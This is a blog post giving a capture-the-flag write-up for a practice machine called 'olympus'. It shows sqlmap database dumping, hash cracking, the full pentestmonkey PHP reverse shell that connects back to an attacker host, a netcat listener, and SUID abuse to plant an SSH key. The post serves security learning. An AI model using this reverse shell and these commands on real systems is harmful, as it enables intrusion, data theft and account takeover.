<!DOCTYPE html>
<html lang="ro-ro">
<head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">olympus | Cyber Blog-ul lui Novac</title>
<meta property="og:title" content="olympus | Cyber Blog-ul lui Novac" />
<meta name="twitter:title" content="olympus | Cyber Blog-ul lui Novac" />
<meta itemprop="name" content="olympus | Cyber Blog-ul lui Novac" />
<meta name="application-name" content="olympus | Cyber Blog-ul lui Novac" />
<meta property="og:site_name" content="" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="ro-ro" />
<meta name="language" content="ro-ro" />

  <link rel="alternate" hreflang="en" href="https://novaclearnscyber.github.io/blog/posts/olympus/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2026-03-17T08:45:13Z />
    <meta property="article:published_time" content=2026-03-17T08:45:13Z />
    <meta property="og:url" content="https://novaclearnscyber.github.io/blog/posts/olympus/" />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "olympus",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2026-03-17",
        "description": "",
        "wordCount":  1320 ,
        "mainEntityOfPage": "True",
        "dateModified": "2026-03-17",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Cyber Blog-ul lui Novac"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.157.0">

    
    <meta property="og:url" content="https://novaclearnscyber.github.io/blog/posts/olympus/">
  <meta property="og:site_name" content="Cyber Blog-ul lui Novac">
  <meta property="og:title" content="olympus">
  <meta property="og:description" content="1 minute room they say
first scan
Found an interesting directory when enumerating
let’s access it
Interesting login form here , we may use sqlmap on this
i am new to sqlmap so i am going to use –wizard option
enter the url when prompted and let it do its job
we find the current database being Olympus
enumerating Olympus using :
we see there are 6 tables inside it, dump them all
use :">
  <meta property="og:locale" content="ro_ro">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:modified_time" content="2026-03-17T08:45:13+00:00">
    <meta property="article:tag" content="Note">
    <meta property="article:tag" content="Journal">
    <meta property="article:tag" content="CyberStuff">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="olympus">
  <meta name="twitter:description" content="1 minute room they say
first scan
Found an interesting directory when enumerating
let’s access it
Interesting login form here , we may use sqlmap on this
i am new to sqlmap so i am going to use –wizard option
enter the url when prompted and let it do its job
we find the current database being Olympus
enumerating Olympus using :
we see there are 6 tables inside it, dump them all
use :">


    

    <link rel="canonical" href="https://novaclearnscyber.github.io/blog/posts/olympus/">
    <link href="/blog/style.min.e390ba7da26222f4dc42a349955d76dbbe44e5ce2535a43de5a70633a0a9ec3c.css" rel="stylesheet">
    <link href="/blog/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/blog/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/blog/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/blog/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/blog/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/blog/favicon.ico">




<link rel="manifest" href="https://novaclearnscyber.github.io/blog/site.webmanifest">

<meta name="msapplication-config" content="/blog/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">
    <meta name="color-scheme" content="light dark">

    
    <link rel="icon" type="image/svg+xml" href="/blog/icons/favicon.svg">

    
    
    
      
<link rel="icon" type="image/png" href="/favicon.png">
<link rel="shortcut icon" href="/favicon.png">
    
</head>


<body>
    <div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://novaclearnscyber.github.io/blog/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/blog/categories/">
                        Categories
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            
        </div>
    </nav>
</div>

    <style>
        .custom-banner {
            width: 100%;

            height: {
                    {
                    .Site.Params.banner_height | default "300px"
                }
            }

            ;
            overflow: hidden;
            position: relative;
        }

        @media (max-width: 768px) {
            .custom-banner {
                height: 200px !important;
                 
            }
        }
    </style>

    
    <div class="custom-banner">
        <div
            style="background-image: url('https://novaclearnscyber.github.io/blog/siteBackcopy.png'); width: 100%; height: 100%; background-size: cover; background-position: center;">
        </div>
    </div>
    

    <div id="content">
        
<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">olympus</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2026-03-17T08:45:13&#43;00:00" itemprop="datePublished"> Mar 17, 2026 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <p>1 minute room they say</p>
<p>first scan<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260315100831.png" alt="">
</p>
<p>Found an interesting directory when enumerating<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316065920.png" alt="">
<br>
let&rsquo;s access it<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316070058.png" alt="">
<br>
Interesting login form here , we may use sqlmap on this<br>
i am new to sqlmap so i am going to use &ndash;wizard option<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316082518.png" alt="">
<br>
enter the url when prompted and let it do its job</p>
<p>we find the current database being Olympus<br>
enumerating Olympus using :</p>
<p>we see there are 6 tables inside it, dump them all<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316083909.png" alt="">
use :</p>
<pre tabindex="0"><code>sqlmap -r sqlREQ --batch --dump-all -D olympus 
</code></pre><p>this way we get both the user table witch seems interesting<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316085702.png" alt="">
<br>
first flag</p>
<p><img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316085804.png" alt="">
<br>
and we got some intering hashes<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316092550.png" alt="">
<br>
i copy pasted the Prometheus hash into a file and run john on it, it going to take some time<br>
and after a long waiting time we get the Prometheus pass being summertime, lets log in<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316093332.png" alt="">
<br>
after logging in and going to the add post tab inside the post menu in the right menu we see this form , this may look like a xss injection<br>
yes this dosent work<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260316094314.png" alt="">
<br>
let&rsquo;s look inside the users , we may observe that all the users have a chat.olympus.thm email address, this may be another subdomain , let&rsquo;s access it</p>
<p>first of all we need to add the domain to the /etc/host using <code>sudo nano /etc/hosts</code> like this :<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317030002.png" alt="">
<br>
now let&rsquo;s access the web page<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317030057.png" alt="">
<br>
cool we can login us Prometheus<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317030139.png" alt="">
<br>
ok interesting looks like a chat app , running inside home.php , we may use a php reverse shell here<br>
rev shell that i used</p>
<pre tabindex="0"><code>&lt;?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = &#34;1.0&#34;;       
$ip = &#39;0000&#39;;  // CHANGE THIS
$port =00000; // change this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = &#39;uname -a; w; id; /bin/sh -i&#39;;
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists(&#39;pcntl_fork&#39;)) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit(&#34;ERROR: Can&#39;t fork&#34;);
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit(&#34;Error: Can&#39;t setsid()&#34;);
                exit(1);
        }

        $daemon = 1;
} else {
        printit(&#34;WARNING: Failed to daemonise.  This is quite common and not fatal.&#34;);
}

// Change to a safe directory
chdir(&#34;/&#34;);

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit(&#34;$errstr ($errno)&#34;);
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 =&gt; array(&#34;pipe&#34;, &#34;r&#34;),  // stdin is a pipe that the child will read from
   1 =&gt; array(&#34;pipe&#34;, &#34;w&#34;),  // stdout is a pipe that the child will write to
   2 =&gt; array(&#34;pipe&#34;, &#34;w&#34;)   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit(&#34;ERROR: Can&#39;t spawn shell&#34;);
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won&#39;t
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit(&#34;Successfully opened reverse shell to $ip:$port&#34;);

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit(&#34;ERROR: Shell connection terminated&#34;);
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit(&#34;ERROR: Shell process terminated&#34;);
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process&#39;s STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit(&#34;SOCK READ&#34;);
                $input = fread($sock, $chunk_size);
                if ($debug) printit(&#34;SOCK: $input&#34;);
                fwrite($pipes[0], $input);
        }

        // If we can read from the process&#39;s STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit(&#34;STDOUT READ&#34;);
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit(&#34;STDOUT: $input&#34;);
                fwrite($sock, $input);
        }

        // If we can read from the process&#39;s STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit(&#34;STDERR READ&#34;);
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit(&#34;STDERR: $input&#34;);
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we&#39;ve daemonised ourself
// (I can&#39;t figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print &#34;$string\n&#34;;
        }
}

?&gt;
</code></pre><p>is important to save this rev shell script as a .php file<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317032929.png" alt="">
<br>
now that we upload a shell we have to acces it somehow , for this lets run another sqlmap command</p>
<pre tabindex="0"><code>sqlmap -u &#34;http://olympus.thm/~webmaster/search.php&#34; --data=&#34;search=1337*&amp;submit=&#34; --dbs --random-agent -v 3 --batch -D olympus --dump --fresh-querie
</code></pre><p>this command will return a table that should look like that<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317034333.png" alt="">
<br>
now if we start a listener with</p>
<pre tabindex="0"><code>rlwrap nc -lnvp 79 
</code></pre><p>and access<br>
<code>http://chat.olympus.thm/uploads/&lt;YOUR_HASH&gt;.php</code><br>
we should receive a rev shell<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317034551.png" alt="">
<br>
and boom RCE<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317034708.png" alt="">
<br>
we can upgrade the shell like this<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317035108.png" alt="">
<br>
lets enumerate some SUID with</p>
<pre tabindex="0"><code>find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2&gt;/dev/null
</code></pre><p>before that we cand find naother flag in zeus home<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317035311.png" alt="">
<br>
the SUID returned us an interesting binary at : /usr/bin/cputils that copies file from one location to another , knowing that we can switch the location of our ssh keys with the zeus account ,first of all we need to create a ssh key on our machine like this<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317043327.png" alt="">
<br>
now we need to copy on our working directory like this<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317043621.png" alt="">
<br>
then we need to cat our pub key like this <img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317043805.png" alt="">
<br>
then run cputils like this<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317043857.png" alt="">
<br>
and now connect to zeus using ssh and the key<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317043922.png" alt="">
<br>
and we are zeus<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317044116.png" alt="">
<br>
after enumerating some files we find this<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317044257.png" alt="">
<br>
wierd php file lets cat it<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317044328.png" alt="">
<br>
SUID FOUNDDDD !!!!!!!<br>
<img src="/blog/images/blog-ul-meu/static/Pasted%20image%2020260317044411.png" alt="">
<br>
and we found the last flag using</p>
<pre tabindex="0"><code>grep -irl &#39;flag{&#39;
</code></pre>
            </div>
        </article></main>
</div>

    </div>
    <footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
</div>
    <small class="footer_copyright">
        © 2026 .
        
    </small>
</footer>
</body>

</html>